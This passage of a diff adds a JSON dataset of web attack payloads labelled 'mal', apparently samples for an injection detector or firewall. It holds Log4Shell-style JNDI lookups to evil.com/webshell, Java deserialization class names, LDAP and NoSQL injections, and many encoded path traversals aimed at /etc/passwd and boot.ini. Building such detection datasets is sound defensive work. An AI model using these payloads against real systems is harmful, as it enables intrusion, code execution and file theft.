+  "payload": "{\"test\": \"Y2xvbmV0cmFuc2Zvcm1lcg\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"runtime.clonetransformer\": \"test\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"foo\": \"&#36;{jndi:ldap://evil.com/webshell}\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "java.Runtime=test"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "test=java.io.PipedReader"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.io.FilterInputStream</element></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "test=java.lang.Runtime"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.evil.runtime</element></l3></l2></l1></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "java.evil.processbuilder=test"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"java.io.OutputStream\": \"test\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.io.BufferedInputStream</element></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "ProcessBuilder.evil.prototypeserializationfactory=test"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "ProcessBuilder.evil.whileclosure=test"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"java.lang.System\": \"test\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "ProcessBuilder.evil.instantiatefactory=test"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">runtime.forclosure</element></l3></l2></l1></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"Bmb3JjbG9zdXJl\": \"test\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"java.io.StringReader\": \"test\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.io.BufferedInputStream</element></l3></l2></l1></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.lang.Integer</element></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"com.opensymphony.xwork2\": \"test\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"test\": \"java.lang.Class\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "test=GZvcmNsb3N1cmU"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "test=Cs7QAF"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"GZvcmNsb3N1cmU\": \"test\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">HJ1bnRpbWU</element></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><tag>\"${jndi:ldap://evil.com/webshell}\"</tag>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "java.io.BufferedReader=test"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"ProcessBuilder.evil.forclosure\": \"test\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">HJ1bnRpbWU</element></l3></l2></l1></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"org.omg.CORBA\": \"test\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"test\": \"HdoaWxlY2xvc3VyZQ\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"test\": \"ProcessBuilder.evil.invokertransformer\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">runtime.forclosure</element></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "test=java.io.FilterInputStream"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.io.OutputStream\">element_value</element></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "test=java.io.PipedOutputStream"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"test\": \"java.io.PrintStream\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.io.ByteArrayInputStream</element></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "javax.script.ScriptEngineManager=test"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"java.io.PipedOutputStream\": \"test\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"foo\": \"$&LBRACE;jndi:ldap://evil.com/webshell}\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">BpbnZva2VydHJhbnNmb3JtZXI</element></l3></l2></l1></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "test=aW5zdGFudGlhdGVmYWN0b3J5"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "test=runtime.prototypeclonefactory"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "test=Y2xvbmV0cmFuc2Zvcm1lcg"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">d2hpbGVjbG9zdXJl</element></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.lang.StringBuilder\">element_value</element></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.evil.runtime</element></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"test\": \"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "test=BydW50aW1l"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "test=java.lang.Integer"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"java.lang.String\": \"test\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "test=java.io.StringReader"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">runtime.whileclosure</element></l3></l2></l1></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "java.io.FilterInputStream=test"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"test\": \"java.lang.reflect\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "test=d2hpbGVjbG9zdXJl"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">BydW50aW1l</element></l3></l2></l1></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "test=java.io.BufferedInputStream"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "runtime.prototypeserializationfactory=test"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "test=Zm9yY2xvc3VyZQ"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">rO0ABQ</element></xml>\n-----------------------------thisissparta--"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">HdoaWxlY2xvc3VyZQ</element></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "HJ1bnRpbWU=test"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"test\": \"java.lang.Process\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.io.PipedReader</element></l3></l2></l1></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">Gluc3RhbnRpYXRldHJhbnNmb3JtZXI</element></l3></l2></l1></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.lang.Class</element></l3></l2></l1></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">runtime.whileclosure</element></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"test\": \"Cs7QAF\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">ProcessBuilder.evil.whileclosure</element></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "test=Gludm9rZXJ0cmFuc2Zvcm1lcg"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"test\": \"java.io.BufferedReader\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.io.InputStream</element></l3></l2></l1></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">Gludm9rZXJ0cmFuc2Zvcm1lcg</element></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "test=java.ProcessBuilder"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "java.io.PushbackInputStream=test"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.lang.Number</element></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.evil.processbuilder</element></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"test\": \"java.io.ByteArrayOutputStream\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "test=runtime.clonetransformer"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"test\": \"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><element attribute_name=\"KztAAU\">element_value</element></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "test=runtime.instantiatetransformer"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"test\": \"runtime.forclosure\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"test\": \"java.io.ObjectOutputStream\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg</element></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "test=com.opensymphony.xwork2"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "*"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "*(|(objectclass=*))"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "x' or name()='username' or 'x'='ys"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": ")(cn=))\\x00"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "%21"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "%2A%7C"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "*)(&"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "admin*)((|userpassword=*)"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "%2A%28%7C%28objectclass%3D%2A%29%29"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "*(|(mail=*))"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "*()|&'"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "*/*"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "/"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "%7C"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "&"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "@*"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "*)(uid=*))(|(uid=*"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "admin*)((|userPassword=*)"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "("
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "!"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": ")"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "*|"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "%26"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "x' or name()='username' or 'x'='y"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "%29"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "admin*"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "*))%00"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "|"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "%28"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "facsimileTelephoneNumber"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "%2A%28%7C%28mail%3D%2A%29%29"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "*()|%26'"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "|| 1==1"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "true, $where: '1 == 1'"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "' && this.password.match(/.*/)//+%00"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "[$ne]=1"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "1, $where: '1 == 1'"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "';sleep(5000);'"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "';sleep(5000);+'"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "';return 'a'=='a' && ''=='"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "'%20%26%26%20this.passwordzz.match(/.*/)//+%00"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "'%20%26%26%20this.password.match(/.*/)//+%00"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "{$gt: ''}"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "', $where: '1 == 1'"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "{\"&exists\":false}"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "\";return(true);var xyz='a"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "' && this.passwordzz.match(/.*/)//+%00"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "{\"$gt\": \"\"}"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "$where: '1 == 1'"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "' } ], $comment:'successful MongoDB injection'"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "', $or: [ {}, { 'a':'a"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "db.injection.insert({success:1});"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "';sleep(5000);"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": ", $where: '1 == 1'"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "{ $ne: 1 }"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "0;return true"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qf%c0%5e%c0%5e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qfetc%c0%qfpasswd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%2e.\\%2e.\\boot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%fc%80%80%80%80%ae%fc%80%80%80%80%ae\\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\\%fc%80%80%80%80%ae%fc%80%80%80%80%ae\\windows\\system32\\drivers\\etc\\hosts"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66etc%%32%%66passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%afetc%c1%afissue"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%uff0e%uff0e%uEFC8etc%uEFC8issue"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": ".?%5cetc%5cpasswd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5c0x2e0x2e%5cetc%5cissue"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": ".%2e%uEFC8.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8etc%uEFC8passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "..../%bg%qf..../%bg%qf..../%bg%qf..../%bg%qf..../%bg%qf..../%bg%qfboot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./boot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": ".%2e%u2215.%2e%u2215.%2e%u2215.%2e%u2215.%2e%u2215.%2e%u2215etc%u2215passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1cboot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5c%f0%80%80%ae%f0%80%80%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%2e.%c1%afboot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2fetc0x2fpasswd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1cetc%c1%1cissue"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc%u2215passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0%ae%c0%ae\\{FILE}"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25afetc%25c0%25afpasswd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%f8%80%80%80%ae%f8%80%80%80%ae%u2216%f8%80%80%80%ae%f8%80%80%80%ae%u2216etc%u2216passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "..%010x5c..%010x5c..%010x5c..%010x5c..%010x5cetc0x5cpasswd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8%fc%80%80%80%80%ae%fc%80%80%80%80%ae%uEFC8etc%uEFC8passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8%c0.%c0.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%252e%252e\\%252e%252e\\%252e%252e\\etc\\passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0%2e%c0%2e%c1%1cetc%c1%1cissue"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%252e%252e%u2216%252e%252e%u2216%252e%252e%u2216etc%u2216passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "..../%%35%%63..../%%35%%63..../%%35%%63..../%%35%%63..../%%35%%63..../%%35%%63boot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%252e%252e%uF025%252e%252e%uF025%252e%252e%uF025etc%uF025issue"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%%c0%6e%c0%6e%u2216etc%u2216passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%%32%%65%%32%%65%252f%%32%%65%%32%%65%252fboot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": ".../.%c1%1c.../.%c1%1c.../.%c1%1c.../.%c1%1c.../.%c1%1cetc%c1%1cissue"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pc%c0%fe%c0%fe%c1%pcboot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%5C..%u2215%5C..%u2215%5C..%u2215%5C..%u2215%5C..%u2215etc%u2215passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "../../../../boot.ini%00index.htm"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%afetc%c0%afissue"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": ".%2e%2f.%2e%2f.%2e%2f.%2e%2f.%2e%2f.%2e%2fboot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216etc%u2216passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255c0x2e0x2e%255cetc%255cissue"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215etc%u2215passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8etc%uEFC8passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "/%uff0e%uff0e%u2216{FILE}"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%c0.%c0./%c0.%c0./%c0.%c0./etc/issue"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": ".?%%32%%66boot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%%32%%65%%32%%65%%32%%66boot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qfboot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2f%%32%%65%%32%%650x2fboot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "?.%e0%80%af?.%e0%80%af?.%e0%80%afetc%e0%80%afpasswd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": ".../.%e0%80%af.../.%e0%80%af.../.%e0%80%af.../.%e0%80%af.../.%e0%80%af.../.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8s%252e%252e%c1%8setc%c1%8sissue"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
